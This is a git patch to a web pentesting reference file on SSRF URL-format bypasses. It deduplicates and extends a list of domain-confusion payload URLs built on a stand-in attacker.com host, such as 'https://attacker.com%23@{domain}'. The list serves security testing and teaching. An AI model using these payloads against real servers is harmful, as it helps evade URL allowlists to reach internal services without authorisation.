From a3d91ce3626b5660d55a04503a365f01e6a81e62 Mon Sep 17 00:00:00 2001
From: Eferus <11998540+Eferus@users.noreply.github.com>
Date: Sat, 6 May 2023 04:28:16 +0200
Subject: [PATCH] Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
---
 .../url-format-bypass.md | 24 +++++++------------
 1 file changed, 8 insertions(+), 16 deletions(-)

diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index b7949bb2..2382edfe 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -120,26 +120,17 @@ attacker。com
 ```bash
 # Try also to change attacker.com for 127.0.0.1 to try to access localhost
-http://{domain}@attacker.com
-http://{domain}%6D@attacker.com
-https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
-http://attacker.com#{domain}
-http://{domain}.attacker.com
-http://attacker.com/{domain}
-http://attacker.com/?d={domain}
+# Try replacing https by http
+# Try URL-encoded characters
 https://{domain}@attacker.com
-https://attacker.com#{domain}
 https://{domain}.attacker.com
+https://{domain}%6D@attacker.com
 https://attacker.com/{domain}
 https://attacker.com/?d={domain}
-http://{domain}@attacker.com
-http://attacker.com#{domain}
-http://{domain}.attacker.com
-http://attacker.com/{domain}
-http://attacker.com/?d={domain}
-http://attacker.com%00{domain}
-http://attacker.com?{domain}
-http://attacker.com///{domain}
+https://attacker.com#{domain}
+https://attacker.com@{domain}
+https://attacker.com#@{domain}
+https://attacker.com%23@{domain}
 https://attacker.com%00{domain}
 https://attacker.com%0A{domain}
 https://attacker.com?{domain}
 
@@ -153,6 +144,7 @@ https://attacker.com\@@{domain}
 https://attacker.com:\@@{domain}
 https://attacker.com#\@{domain}
 https://attacker.com\anything@{domain}/
+https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
 
 # On each IP position try to put 1 attackers domain and the others the victim domain
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/